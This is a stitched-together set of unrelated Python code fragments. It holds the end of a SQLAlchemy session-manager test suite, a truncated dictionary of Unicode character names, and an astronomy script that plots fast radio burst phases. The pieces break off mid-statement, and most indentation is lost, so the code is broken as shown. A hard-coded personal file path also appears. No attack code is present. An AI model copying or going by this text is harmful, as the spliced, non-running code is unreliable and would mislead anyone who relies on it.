}
test = Test(id=3, data={})
session.add(test)
transaction.commit()
assert session.query(Test).filter(Test.id == 3).one().data == {}
mgr.dispose()
def test_session_manager_sharing(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base):
__tablename__ = 'test'
id = Column(Integer, primary_key=True)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
test = Test(id=1)
# session_manager is a weakref proxy so we need to go through some hoops
# to get the actual instance for a proper identity test
assert test.session_manager.__repr__.__self__ is mgr
session = mgr.session()
session.add(test)
transaction.commit()
assert session.query(Test).one().session_manager.__repr__.__self__ is mgr
mgr.dispose()
def test_session_manager_i18n(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base):
__tablename__ = 'test'
id = Column(Integer, primary_key=True)
text_translations = Column(HSTORE)
text = translation_hybrid(text_translations)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
mgr.set_locale(default_locale='en_us', current_locale='en_us')
test = Test(id=1, text='no')
assert test.text == 'no'
mgr.set_locale(default_locale='en_us', current_locale='de_ch')
assert test.text == 'no'
test.text_translations['de_ch'] = 'nein'
assert test.text == 'nein'
mgr.set_locale(default_locale='en_us', current_locale='en_us')
assert test.text == 'no'
session = mgr.session()
session.add(test)
transaction.commit()
test = session.query(Test).one()
assert test.text == 'no'
mgr.set_locale(default_locale='en_us', current_locale='de_ch')
assert test.text == 'nein'
# make sure the locale is shared with the query as well
assert mgr.session().query(Test).order_by(Test.text).first()
assert mgr.session().query(Test).filter_by(text='nein').first()
assert not mgr.session().query(Test).filter_by(text='no').first()
mgr.set_locale(default_locale='en_us', current_locale='en_us')
assert not mgr.session().query(Test).filter_by(text='nein').first()
assert mgr.session().query(Test).filter_by(text='no').first()
# make sure session managers are independent
sec = SessionManager(postgres_dsn, Base)
sec.set_current_schema('testing')
mgr.set_locale(default_locale='en_us', current_locale='en_us')
sec.set_locale(default_locale='en_us', current_locale='de_ch')
sec.activate()
assert sec.session().query(Test).one().text == 'nein'
mgr.activate()
assert mgr.session().query(Test).one().text == 'no'
sec.activate()
assert sec.session().query(Test).filter_by(text='nein').first()
mgr.activate()
assert mgr.session().query(Test).filter_by(text='no').first()
sec.dispose()
mgr.dispose()
def test_uuid_type(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base):
__tablename__ = 'test'
id = Column(UUID, primary_key=True, default=uuid.uuid4)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
session = mgr.session()
test = Test()
session.add(test)
transaction.commit()
assert isinstance(session.query(Test).one().id, uuid.UUID)
mgr.dispose()
def test_lowercase_text(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base):
__tablename__ = 'test'
id = Column(LowercaseText, primary_key=True)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
session = mgr.session()
test = Test()
test.id = 'Foobar'
session.add(test)
transaction.commit()
assert session.query(Test).one().id == 'foobar'
assert session.query(Test).filter(Test.id == 'Foobar').one().id == 'foobar'
assert session.query(Test).filter(Test.id == 'foobar').one().id == 'foobar'
mgr.dispose()
def test_utc_datetime_naive(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base):
__tablename__ = 'test'
id = Column(Integer, primary_key=True)
date = Column(UTCDateTime)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
session = mgr.session()
with pytest.raises(sqlalchemy.exc.StatementError):
test = Test(date=datetime.now())
session.add(test)
session.flush()
mgr.dispose()
def test_utc_datetime_aware(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base):
__tablename__ = 'test'
id = Column(Integer, primary_key=True)
date = Column(UTCDateTime)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
session = mgr.session()
tz = timezone('Europe/Zurich')
date = datetime(2015, 3, 5, 12, 0).replace(tzinfo=tz)
test = Test(date=date)
session.add(test)
session.flush()
transaction.commit()
assert session.query(Test).one().date == date
mgr.dispose()
def test_timestamp_mixin(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base, TimestampMixin):
__tablename__ = 'test'
id = Column(Integer, primary_key=True)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
session = mgr.session()
test = Test()
session.add(test)
session.flush()
transaction.commit()
    now
None,
'TAI THAM VOWEL SIGN OO': None,
'TAI THAM VOWEL SIGN OY': None,
'TAI THAM VOWEL SIGN TALL AA': None,
'TAI THAM VOWEL SIGN THAM AI': None,
'TAI THAM VOWEL SIGN U': None,
'TAI THAM VOWEL SIGN UE': None,
'TAI THAM VOWEL SIGN UU': None,
'TAI THAM VOWEL SIGN UUE': None,
'TAI VIET LETTER HIGH BO': None,
'TAI VIET LETTER HIGH CHO': None,
'TAI VIET LETTER HIGH CO': None,
'TAI VIET LETTER HIGH DO': None,
'TAI VIET LETTER HIGH FO': None,
'TAI VIET LETTER HIGH GO': None,
'TAI VIET LETTER HIGH HO': None,
'TAI VIET LETTER HIGH KHHO': None,
'TAI VIET LETTER HIGH KHO': None,
'TAI VIET LETTER HIGH KO': None,
'TAI VIET LETTER HIGH LO': None,
'TAI VIET LETTER HIGH MO': None,
'TAI VIET LETTER HIGH NGO': None,
'TAI VIET LETTER HIGH NO': None,
'TAI VIET LETTER HIGH NYO': None,
'TAI VIET LETTER HIGH O': None,
'TAI VIET LETTER HIGH PHO': None,
'TAI VIET LETTER HIGH PO': None,
'TAI VIET LETTER HIGH RO': None,
'TAI VIET LETTER HIGH SO': None,
'TAI VIET LETTER HIGH THO': None,
'TAI VIET LETTER HIGH TO': None,
'TAI VIET LETTER HIGH VO': None,
'TAI VIET LETTER HIGH YO': None,
'TAI VIET LETTER LOW BO': None,
'TAI VIET LETTER LOW CHO': None,
'TAI VIET LETTER LOW CO': None,
'TAI VIET LETTER LOW DO': None,
'TAI VIET LETTER LOW FO': None,
'TAI VIET LETTER LOW GO': None,
'TAI VIET LETTER LOW HO': None,
'TAI VIET LETTER LOW KHHO': None,
'TAI VIET LETTER LOW KHO': None,
'TAI VIET LETTER LOW KO': None,
'TAI VIET LETTER LOW LO': None,
'TAI VIET LETTER LOW MO': None,
'TAI VIET LETTER LOW NGO': None,
'TAI VIET LETTER LOW NO': None,
'TAI VIET LETTER LOW NYO': None,
'TAI VIET LETTER LOW O': None,
'TAI VIET LETTER LOW PHO': None,
'TAI VIET LETTER LOW PO': None,
'TAI VIET LETTER LOW RO': None,
'TAI VIET LETTER LOW SO': None,
'TAI VIET LETTER LOW THO': None,
'TAI VIET LETTER LOW TO': None,
'TAI VIET LETTER LOW VO': None,
'TAI VIET LETTER LOW YO': None,
'TAI VIET MAI KANG': None,
'TAI VIET MAI KHIT': None,
'TAI VIET SYMBOL HO HOI': None,
'TAI VIET SYMBOL KOI KOI': None,
'TAI VIET SYMBOL KON': None,
'TAI VIET SYMBOL NUENG': None,
'TAI VIET SYMBOL SAM': None,
'TAI VIET TONE MAI EK': None,
'TAI VIET TONE MAI NUENG': None,
'TAI VIET TONE MAI SONG': None,
'TAI VIET TONE MAI THO': None,
'TAI VIET VOWEL AA': None,
'TAI VIET VOWEL AM': None,
'TAI VIET VOWEL AN': None,
'TAI VIET VOWEL AUE': None,
'TAI VIET VOWEL AY': None,
'TAI VIET VOWEL E': None,
'TAI VIET VOWEL I': None,
'TAI VIET VOWEL IA': None,
'TAI VIET VOWEL O': None,
'TAI VIET VOWEL U': None,
'TAI VIET VOWEL UA': None,
'TAI VIET VOWEL UE': None,
'TAI VIET VOWEL UEA': None,
'TAMIL AS ABOVE SIGN': None,
'TAMIL CONSONANT C': None,
'TAMIL CONSONANT H': None,
'TAMIL CONSONANT J': None,
'TAMIL CONSONANT K': None,
'TAMIL CONSONANT KSS': None,
'TAMIL CONSONANT L': None,
'TAMIL CONSONANT LL': None,
'TAMIL CONSONANT LLL': None,
'TAMIL CONSONANT M': None,
'TAMIL CONSONANT N': None,
'TAMIL CONSONANT NG': None,
'TAMIL CONSONANT NN': None,
'TAMIL CONSONANT NNN': None,
'TAMIL CONSONANT NY': None,
'TAMIL CONSONANT P': None,
'TAMIL CONSONANT R': None,
'TAMIL CONSONANT RR': None,
'TAMIL CONSONANT S': None,
'TAMIL CONSONANT SH': None,
'TAMIL CONSONANT SS': None,
'TAMIL CONSONANT T': None,
'TAMIL CONSONANT TT': None,
'TAMIL CONSONANT V': None,
'TAMIL CONSONANT Y': None,
'TAMIL CREDIT SIGN': None,
'TAMIL DAY SIGN': None,
'TAMIL DEBIT SIGN': None,
'TAMIL DIGIT ZERO': None,
'TAMIL LETTER SHA': None,
'TAMIL MONTH SIGN': None,
'TAMIL NUMBER SIGN': None,
'TAMIL OM': None,
'TAMIL RUPEE SIGN': None,
'TAMIL SYLLABLE CAA': None,
'TAMIL SYLLABLE CAI': None,
'TAMIL SYLLABLE CAU': None,
'TAMIL SYLLABLE CE': None,
'TAMIL SYLLABLE CEE': None,
'TAMIL SYLLABLE CI': None,
'TAMIL SYLLABLE CII': None,
'TAMIL SYLLABLE CO': None,
'TAMIL SYLLABLE COO': None,
'TAMIL SYLLABLE CU': None,
'TAMIL SYLLABLE CUU': None,
'TAMIL SYLLABLE HAA': None,
'TAMIL SYLLABLE HAI': None,
'TAMIL SYLLABLE HAU': None,
'TAMIL SYLLABLE HE': None,
'TAMIL SYLLABLE HEE': None,
'TAMIL SYLLABLE HI': None,
'TAMIL SYLLABLE HII': None,
'TAMIL SYLLABLE HO': None,
'TAMIL SYLLABLE HOO': None,
'TAMIL SYLLABLE HU': None,
'TAMIL SYLLABLE HUU': None,
'TAMIL SYLLABLE JAA': None,
'TAMIL SYLLABLE JAI': None,
'TAMIL SYLLABLE JAU': None,
'TAMIL SYLLABLE JE': None,
'TAMIL SYLLABLE JEE': None,
'TAMIL SYLLABLE JI': None,
'TAMIL SYLLABLE JII': None,
'TAMIL SYLLABLE JO': None,
'TAMIL SYLLABLE JOO': None,
'TAMIL SYLLABLE JU': None,
'TAMIL SYLLABLE JUU': None,
'TAMIL SYLLABLE KAA': None,
'TAMIL SYLLABLE KAI': None,
'TAMIL SYLLABLE KAU': None,
'TAMIL SYLLABLE KE': None,
'TAMIL SYLLABLE KEE': None,
'TAMIL SYLLABLE KI': None,
'TAMIL SYLLABLE KII': None,
'TAMIL SYLLABLE KO': None,
'TAMIL SYLLABLE KOO': None,
'TAMIL SYLLABLE KSSA': None,
'TAMIL SYLLABLE KSSAA': None,
'TAMIL SYLLABLE KSSAI': None,
'TAMIL SYLLABLE KSSAU': None,
'TAMIL SYLLABLE KSSE': None,
'TAMIL SYLLABLE KSSEE': None,
'TAMIL SYLLABLE KSSI': None,
'TAMIL SYLLABLE KSSII': None,
'TAMIL SYLLABLE KSSO': None,
'TAMIL SYLLABLE KSSOO': None,
'TAMIL SYLLABLE KSSU': None,
'TAMIL SYLLABLE KSSUU': None,
'TAMIL SYLLABLE KU': None,
'TAMIL SYLLABLE KUU': None,
'TAMIL SYLLABLE LAA': None,
'TAMIL SYLLABLE LAI': None,
'TAMIL SYLLABLE LAU': None,
'TAMIL SYLLABLE LE': None,
'TAMIL SYLLABLE LEE': None,
'TAMIL SYLLABLE LI': None,
'TAMIL SYLLABLE LII': None,
'TAMIL SYLLABLE LLAA': None,
'TAMIL SYLLABLE LLAI': None,
'TAMIL SYLLABLE LLAU': None,
'TAMIL SYLLABLE LLE': None,
'TAMIL SYLLABLE LLEE': None,
'TAMIL SYLLABLE LLI': None,
'TAMIL SYLLABLE LLII': None,
'TAMIL SYLLABLE LLLAA': None,
'TAMIL SYLLABLE LLLAI': None,
'TAMIL SYLLABLE LLLAU': None,
'TAMIL SYLLABLE LLLE': None,
'TAMIL SYLLABLE LLLEE': None,
'TAMIL SYLLABLE LLLI': None,
'TAMIL SYLLABLE LLLII': None,
'TAMIL SYLLABLE LLLO': None,
'TAMIL SYLLABLE LLLOO': None,
'TAMIL SYLLABLE LLLU': None,
'TAMIL SYLLABLE LLLUU': None,
'TAMIL SYLLABLE LLO': None,
'TAMIL SYLLABLE LLOO': None,
'TAMIL SYLLABLE LLU': None,
'TAMIL SYLLABLE LLUU': None,
'TAMIL SYLLABLE LO': None,
'TAMIL SYLLABLE LOO': None,
'TAMIL SYLLABLE LU': None,
'TAMIL SYLLABLE LUU': None,
'TAMIL SYLLABLE MAA': None,
'TAMIL SYLLABLE MAI': None,
'TAMIL SYLLABLE MAU': None,
'TAMIL SYLLABLE ME': None,
'TAMIL SYLLABLE MEE': None,
'TAMIL SYLLABLE MI': None,
'TAMIL SYLLABLE MII': None,
'TAMIL SYLLABLE MO': None,
'TAMIL SYLLABLE MOO': None,
'TAMIL SYLLABLE MU': None,
'TAMIL SYLLABLE MUU': None,
'TAMIL SYLLABLE NAA': None,
'TAMIL SYLLABLE NAI': None,
'TAMIL SYLLABLE NAU': None,
'TAMIL SYLLABLE NE': None,
'TAMIL SYLLABLE NEE': None,
'TAMIL SYLLABLE NGAA': None,
'TAMIL SYLLABLE NGAI': None,
'TAMIL SYLLABLE NGAU': None,
'TAMIL SYLLABLE NGE': None,
'TAMIL SYLLABLE NGEE': None,
'TAMIL SYLLABLE NGI': None,
'TAMIL SYLLABLE NGII': None,
'TAMIL SYLLABLE NGO': None,
'TAMIL SYLLABLE NGOO': None,
'TAMIL SYLLABLE NGU': None,
'TAMIL SYLLABLE NGUU': None,
'TAMIL SYLLABLE NI': None,
'TAMIL SYLLABLE NII': None,
'TAMIL SYLLABLE NNAA': None,
'TAMIL SYLLABLE NNAI': None,
'TAMIL SYLLABLE NNAU': None,
'TAMIL SYLLABLE NNE': None,
'TAMIL SYLLABLE NNEE': None,
'TAMIL SYLLABLE NNI': None,
'TAMIL SYLLABLE NNII': None,
'TAMIL SYLLABLE NNNAA': None,
'TAMIL SYLLABLE NNNAI': None,
'TAMIL SYLLABLE NNNAU': None,
'TAMIL SYLLABLE NNNE': None,
'TAMIL SYLLABLE NNNEE': None,
'TAMIL SYLLABLE NNNI': None,
'TAMIL SYLLABLE NNNII': None,
'TAMIL SYLLABLE NNNO': None,
'TAMIL SYLLABLE NNNOO': None,
'TAMIL SYLLABLE NNNU': None,
'TAMIL SYLLABLE NNNUU': None,
'TAMIL SYLLABLE NNO': None,
'TAMIL SYLLABLE NNOO': None,
'TAMIL SYLLABLE NNU': None,
'TAMIL SYLLABLE NNUU': None,
'TAMIL SYLLABLE NO': None,
'TAMIL SYLLABLE NOO': None,
'TAMIL SYLLABLE NU': None,
'TAMIL SYLLABLE NUU': None,
'TAMIL SYLLABLE NYAA': None,
'TAMIL SYLLABLE NYAI': None,
'TAMIL SYLLABLE NYAU': None,
'TAMIL SYLLABLE NYE': None,
'TAMIL SYLLABLE NYEE': None,
'TAMIL SYLLABLE NYI': None,
'TAMIL SYLLABLE NYII': None,
'TAMIL SYLLABLE NYO': None,
'TAMIL SYLLABLE NYOO': None,
'TAMIL SYLLABLE NYU': None,
'TAMIL SYLLABLE NYUU': None,
'TAMIL SYLLABLE PAA': None,
'TAMIL SYLLABLE PAI': None,
'TAMIL SYLLABLE PAU': None,
'TAMIL SYLLABLE PE': None,
'TAMIL SYLLABLE PEE': None,
'TAMIL SYLLABLE PI': None,
'TAMIL SYLLABLE PII': None,
'TAMIL SYLLABLE PO': None,
'TAMIL SYLLABLE POO': None,
'TAMIL SYLLABLE PU': None,
'TAMIL SYLLABLE PUU': None,
'TAMIL SYLLABLE RAA': None,
'TAMIL SYLLABLE RAI': None,
'TAMIL SYLLABLE RAU': None,
'TAMIL SYLLABLE RE': None,
'TAMIL SYLLABLE REE': None,
'TAMIL SYLLABLE RI': None,
'TAMIL SYLLABLE RII': None,
'TAMIL SYLLABLE RO': None,
'TAMIL SYLLABLE ROO': None,
'TAMIL SYLLABLE RRAA': None,
'TAMIL SYLLABLE RRAI': None,
'TAMIL SYLLABLE RRAU': None,
'TAMIL SYLLABLE RRE': None,
'TAMIL SYLLABLE RREE': None,
'TAMIL SYLLABLE RRI': None,
'TAMIL SYLLABLE RRII': None,
'TAMIL SYLLABLE RRO': None,
'TAMIL SYLLABLE RROO': None,
'TAMIL SYLLABLE RRU': None,
'TAMIL SYLLABLE RRUU': None,
'TAMIL SYLLABLE RU': None,
'TAMIL SYLLABLE RUU': None,
'TAMIL SYLLABLE SAA': None,
'TAMIL SYLLABLE SAI': None,
'TAMIL SYLLABLE SAU': None,
'TAMIL SYLLABLE SE': None,
'TAMIL SYLLABLE SEE': None,
'TAMIL SYLLABLE SHAA': None,
'TAMIL SYLLABLE SHAI': None,
'TAMIL SYLLABLE SHAU': None,
'TAMIL SYLLABLE SHE': None,
'TAMIL SYLLABLE SHEE': None,
'TAMIL SYLLABLE SHI': None,
'TAMIL SYLLABLE SHII': None,
'TAMIL SYLLABLE SHO': None,
'TAMIL SYLLABLE SHOO': None,
'TAMIL SYLLABLE SHRII': None,
'TAMIL SYLLABLE SHU': None,
'TAMIL SYLLABLE SHUU': None,
'TAMIL SYLLABLE SI': None,
'TAMIL SYLLABLE SII': None,
'TAMIL SYLLABLE SO': None,
'TAMIL SYLLABLE SOO': None,
'TAMIL SYLLABLE SSAA': None,
'TAMIL SYLLABLE SSAI': None,
'TAMIL SYLLABLE SSAU': None,
'TAMIL SYLLABLE SSE': None,
'TAMIL SYLLABLE SSEE': None,
'TAMIL SYLLABLE SSI': None,
'TAMIL SYLLABLE SSII': None,
'TAMIL SYLLABLE SSO': None,
'TAMIL SYLLABLE SSOO': None,
'TAMIL SYLLABLE SSU': None,
'TAMIL SYLLABLE SSUU': None,
'TAMIL SYLLABLE SU': None,
'TAMIL SYLLABLE SUU': None,
'TAMIL SYLLABLE TAA': None,
'TAMIL SYLLABLE TAI': None,
'TAMIL SYLLABLE TAU': None,
'TAMIL SYLLABLE TE': None,
'TAMIL SYLLABLE TEE': None,
'TAMIL SYLLABLE TI': None,
'TAMIL SYLLABLE TII': None,
'TAMIL SYLLABLE TO': None,
'TAMIL SYLLABLE TOO': None,
'TAMIL SYLLABLE TTAA': None,
'TAMIL SYLLABLE TTAI': None,
'TAMIL SYLLABLE TTAU': None,
'TAMIL SYLLABLE TTE': None,
'TAMIL SYLLABLE TTEE': None,
'TAMIL SYLLABLE TTI': None,
'TAMIL SYLLABLE TTII': None,
'TAMIL SYLLABLE TTO': None,
'TAMIL SYLLABLE TTOO': None,
'TAMIL SYLLABLE TTU': None,
'TAMIL SYLLABLE TTUU': None,
'TAMIL SYLLABLE TU': None,
'TAMIL SYLLABLE TUU': None,
'TAMIL SYLLABLE VAA': None,
'TAMIL SYLLABLE VAI': None,
'TAMIL SYLLABLE VAU': None,
'TAMIL SYLLABLE VE': None,
'TAMIL SYLLABLE VEE': None,
'TAMIL SYLLABLE VI': None,
'TAMIL SYLLABLE VII': None,
'TAMIL SYLLABLE VO': None,
'TAMIL SYLLABLE VOO': None,
'TAMIL SYLLABLE VU': None,
'TAMIL SYLLABLE VUU': None,
'TAMIL SYLLABLE YAA': None,
'TAMIL SYLLABLE YAI': None,
'TAMIL SYLLABLE YAU': None,
'TAMIL SYLLABLE YE': None,
'TAMIL SYLLABLE YEE': None,
'TAMIL SYLLABLE YI': None,
'TAMIL SYLLABLE YII': None,
'TAMIL SYLLABLE YO': None,
'TAMIL SYLLABLE YOO': None,
    'TAMIL SYLLABLE
<filename>scripts/frbpa_plotting.py
#!/usr/bin/env python3
import numpy as np
import pandas as pd
import json, logging
import argparse
import pandas as pd
from astropy.time import Time, TimeDelta
from astropy import units as u
import datetime
import pylab as plt
import matplotlib as mpl
from matplotlib.patches import Rectangle
from matplotlib.collections import PatchCollection
import matplotlib.gridspec as gridspec
from frbpa.utils import get_phase, get_cycle, get_params
logging_format = '%(asctime)s - %(funcName)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=logging_format)
def sort_dict(dictionary, key_order):
    # return a copy of `dictionary` whose keys follow `key_order`; missing keys are skipped
    sorted_dict = {k: dictionary[k] for k in key_order if k in dictionary.keys()}
    return sorted_dict
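# Quick illustrative example (made-up values): sort_dict({'b': 2, 'a': 1}, ['a', 'b', 'c'])
# would return {'a': 1, 'b': 2} -- entries reordered to follow the given key order,
# with keys absent from the dictionary simply skipped.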
def open_json(data_file):
with open(data_file, 'r') as f:
data = json.load(f)
assert 'obs_duration' in data.keys()
assert 'bursts' in data.keys()
assert 'obs_startmjds' in data.keys()
burst_dict = data['bursts']
snr_dict = data['snr']
obs_duration_dict = data['obs_duration']
obs_startmjds_dict = data['obs_startmjds']
fmin_dict = data['freq_min']
fmax_dict = data['freq_max']
assert len(obs_duration_dict.keys()) == len(obs_startmjds_dict.keys())
assert len(obs_duration_dict.keys()) < 20
assert len(burst_dict.keys()) < 10
assert len(fmin_dict.keys()) == len(fmax_dict.keys())
telescopes = list(obs_duration_dict.keys())
new_obs_startmjds_dict = {}
new_obs_duration_dict = {}
fcen_dict = {}
for k in obs_startmjds_dict.keys():
start_times = obs_startmjds_dict[k]
durations = obs_duration_dict[k]
fmin = fmin_dict[k]
fmax = fmax_dict[k]
#new_start_times = []
new_durations = []
for i, t in enumerate(start_times):
new_durations.append(durations[i]/(3600))
new_obs_duration_dict[k] = new_durations
fcen_dict[k] = (fmax + fmin)/2
obs_duration_dict = new_obs_duration_dict
# Sorting dictionaries by central frequency
fcen_dict = {k: v for k, v in sorted(fcen_dict.items(),
key=lambda item: item[1])}
burst_dict = sort_dict(burst_dict, fcen_dict.keys())
snr_dict = sort_dict(snr_dict, fcen_dict.keys())
obs_duration_dict = sort_dict(obs_duration_dict, fcen_dict.keys())
obs_startmjds_dict = sort_dict(obs_startmjds_dict, fcen_dict.keys())
fmin_dict = sort_dict(fmin_dict, fcen_dict.keys())
fmax_dict = sort_dict(fmax_dict, fcen_dict.keys())
return burst_dict, snr_dict, obs_duration_dict, obs_startmjds_dict, fmin_dict, fmax_dict, fcen_dict
def open_csv(data_file):
burst_data = pd.read_csv(data_file)
burst_data['freq_cen'] = burst_data.loc[: , "freq_min":"freq_max"].mean(1)
burst_data['key'] = burst_data["telescope"] + '/' + burst_data["receiver"]
burst_dict = {}
fmin_dict = {}
fmax_dict = {}
fcen_dict = {}
for k in np.unique(burst_data['key']):
burst_dict[k] = burst_data.loc[burst_data['key'] == k]['mjd']
fmin_dict[k] = burst_data.loc[burst_data['key']==k]['freq_min'].iloc[0]
fmax_dict[k] = burst_data.loc[burst_data['key']==k]['freq_max'].iloc[0]
fcen_dict[k] = burst_data.loc[burst_data['key']==k]['freq_cen'].iloc[0]
fcen_dict = {k: v for k, v in sorted(fcen_dict.items(),
key=lambda item: item[1])}
burst_dict = sort_dict(burst_dict, fcen_dict.keys())
fmin_dict = sort_dict(fmin_dict, fcen_dict.keys())
fmax_dict = sort_dict(fmax_dict, fcen_dict.keys())
return burst_dict, fmin_dict, fmax_dict, fcen_dict
def make_obs_phase_plot(data_file, period, ref_mjd=58369.30, nbins=40, save=False,
show=False, log=False, min_freq=200, max_freq=2500):
"""
Generates burst phase and observation phase distribution plot for a given period.
:param data_file: json file with data
:param period: period to use for phase calculation
:param ref_mjd: reference MJD to use
:param nbins: number of bins in the phase histogram
:param save: to save the plot
:param show: to show the plot
"""
burst_dict, snr_dict, obs_duration_dict, obs_startmjds_dict, fmin_dict, fmax_dict, fcen_dict = open_json(data_file)
bursts = []
for k in burst_dict.keys():
bursts = bursts + burst_dict[k]
obs_duration = []
for k in obs_duration_dict.keys():
obs_duration = obs_duration + obs_duration_dict[k]
obs_startmjds = []
for k in obs_startmjds_dict.keys():
obs_startmjds = obs_startmjds + obs_startmjds_dict[k]
assert len(obs_startmjds) == len(obs_duration)
bursts = np.array(bursts)
obs_duration = np.array(obs_duration)
obs_startmjds = np.array(obs_startmjds)
obs_start_phases = get_phase(obs_startmjds, period, ref_mjd=ref_mjd)
hist, bin_edges_obs = np.histogram(obs_start_phases, bins=nbins)
obs_start_phases_dict = {}
duration_per_phase_dict = {}
burst_per_phase_dict = {}
    duration_per_phase_tot = np.zeros(nbins)  # zeros, not empty: this array is accumulated into below
for k in obs_startmjds_dict.keys():
obs_start_phases_dict[k] = get_phase(np.array(obs_startmjds_dict[k]),
period, ref_mjd=ref_mjd)
durations = np.array(obs_duration_dict[k])
start_phases = obs_start_phases_dict[k]
d_hist = []
for i in range(len(bin_edges_obs)):
if i>0:
dur = durations[(start_phases < bin_edges_obs[i]) &
(start_phases > bin_edges_obs[i-1])].sum()
d_hist.append(dur)
duration_per_phase_tot[i-1] += dur
duration_per_phase_dict[k] = np.array(d_hist)
obs_duration = np.array(obs_duration)
duration_hist = []
for i in range(len(bin_edges_obs)):
if i>0:
duration_hist.append(
obs_duration[(obs_start_phases < bin_edges_obs[i]) &
(obs_start_phases > bin_edges_obs[i-1])].sum())
duration_hist = np.array(duration_hist)
bin_mids = (bin_edges_obs[:-1] + bin_edges_obs[1:])/2
phase_lst = []
for i,k in enumerate(burst_dict.keys()):
print("phase list", k, len(burst_dict[k]))
phase_lst.append(list(get_phase(np.array(burst_dict[k]), period,
ref_mjd=ref_mjd)))
burst_per_phase_dict[k], _ = np.histogram(phase_lst[-1],
bins=nbins, range=(0,1))
phase_tot = [p for l in phase_lst for p in l]
phase_tot.sort()
burst_tot, _ = np.histogram(phase_tot, bins=nbins, range=(0,1))
# PRINTING AVERAGE RATE PER INSTRUMENT
for i,k in enumerate(burst_dict.keys()):
tobs = np.sum(obs_duration_dict[k])
nbursts = len(burst_dict[k])
rate = nbursts / tobs
print("Average rate {}: {:.3f} / h".format(k, rate))
# off = np.where(burst_per_phase_dict[k] == 0)[0]
# on = np.where(burst_per_phase_dict[k] > 0)[0]
# print("Hours Apertif observed TOTAL: {:.2f}".format(
# np.sum(duration_per_phase_dict[k])))
# print("Hours Apertif observed during on phase: {:.2f}".format(
# np.sum(duration_per_phase_dict[k][on])))
# print("Hours Apertif observed during off phase: {:.2f}".format(
# np.sum(duration_per_phase_dict[k][off])))
# DEFINING COLORS
cm = plt.cm.get_cmap('Spectral_r')
burst_hist_colors = []
obs_hist_colors = {}
if 'uGMRT650' in obs_duration_dict.keys():
fcen_dict['uGMRT650'] = 1000
for i,k in enumerate(obs_duration_dict.keys()):
freq = np.log10(fcen_dict[k])
col = (np.log10(max_freq)-freq)/(np.log10(max_freq)-np.log10(min_freq))
color = cm(col)
print(k, mpl.colors.to_hex(color))
if k in burst_dict.keys():
burst_hist_colors.append(color)
obs_hist_colors[k] = color
rate_colors = {
'high': cm((np.log10(max_freq)-np.log10(1800))/(np.log10(max_freq)-np.log10(min_freq))),
'middle': cm((np.log10(max_freq)-np.log10(500))/(np.log10(max_freq)-np.log10(min_freq))),
'low': cm((np.log10(max_freq)-np.log10(300))/(np.log10(max_freq)-np.log10(min_freq)))
}
if 'uGMRT650' in obs_duration_dict.keys():
fcen_dict['uGMRT650'] = 650
# PLOTTING
fig, ax = plt.subplots(2, 1, sharex=True, figsize=(9,7),
gridspec_kw={'height_ratios': [1,1]})
ax1 = ax[0]
yhist,xhist,_ = ax1.hist(phase_lst, bins=bin_edges_obs, stacked=True,
density=False, label=burst_dict.keys(),
edgecolor='black', linewidth=0.5, color=burst_hist_colors)
ax1.set_ylabel('N. Bursts')
ax1.set_xlim(0,1)
print("YLIM", 0, int(yhist[-1].max()*1.1))
ax1.set_ylim(0, max(int(yhist[-1].max()*1.1), 4))
ax1.legend(loc=2)
ax1.text(-0.07, 0.95, "a", transform=ax1.transAxes, weight='bold')
ax2 = ax[1]
cum_ds = np.zeros(nbins)
for i, k in enumerate(duration_per_phase_dict):
d = duration_per_phase_dict[k]
ax2.bar(bin_edges_obs[:-1], d, width=bin_edges_obs[1]-bin_edges_obs[0],
align='edge', bottom=cum_ds, alpha=1,
label="{} {:d} MHz".format(k, int(fcen_dict[k])),
edgecolor='black', linewidth=0.2, color=obs_hist_colors[k])
cum_ds += d
ax2.set_xlabel('Phase')
ax2.set_ylabel('Obs. Duration (h)')
ax2.legend(loc=2)
ax2.text(-0.07, 0.95, "b", transform=ax2.transAxes, weight='bold')
plt.tight_layout()
if save:
print('Plot saved: ./burst_obs_phase_hist.png')
plt.savefig('./burst_obs_phase_hist.png', pad_inches=0,
bbox_inches='tight', dpi=200)
plt.savefig('./burst_obs_phase_hist.pdf', pad_inches=0,
bbox_inches='tight', dpi=200)
if show:
plt.show()
# SAVING COUNTS, OBS_DURATION AND PHASE BIN
if log:
print("Writing log")
dir_out = '/home/ines/Documents/projects/R3/periodicity/burst_phases/'
with open(dir_out+'counts_per_phase_p{:.2f}.txt'.format(period), 'w') as f:
f.write("# phase_bin counts chime_counts arts_counts lofar_counts obs_duration chime_duration arts_duration lofar_duration\n")
for i in range(nbins):
f.write("{:.3f} {} {} {} {} {:.3f} {:.3f} {:.3f} {:.3f}\n".format(
bin_mids[i], burst_tot[i],
burst_per_phase_dict["CHIME/FRB"][i],
burst_per_phase_dict["Apertif"][i],
burst_per_phase_dict["LOFAR"][i],
duration_per_phase_tot[i],
duration_per_phase_dict["CHIME/FRB"][i],
duration_per_phase_dict["Apertif"][i],
duration_per_phase_dict["LOFAR"][i]))
for i,k in enumerate(burst_dict.keys()):
if k == "CHIME/FRB":
inst = k.replace("/FRB", "")
else:
inst = k
np.save(dir_out + 'phase_{}_p{:.2f}_f{:.1f}'.format(inst, period,
fcen_dict[k]), [burst_dict[k], phase_lst[i]])
def make_obs_phase_plot_csv(data_file, period, ref_mjd=58369.30, nbins=40,
save=False, show=True, min_freq=900, max_freq=6000):
"""
    Generates a burst phase distribution plot for a given period (the csv input carries no observation exposure data).
:param data_file: csv file with data
:param period: period to use for phase calculation
:param ref_mjd: reference MJD to use
:param nbins: number of bins in the phase histogram
:param save: to save the plot
:param show: to show the plot
"""
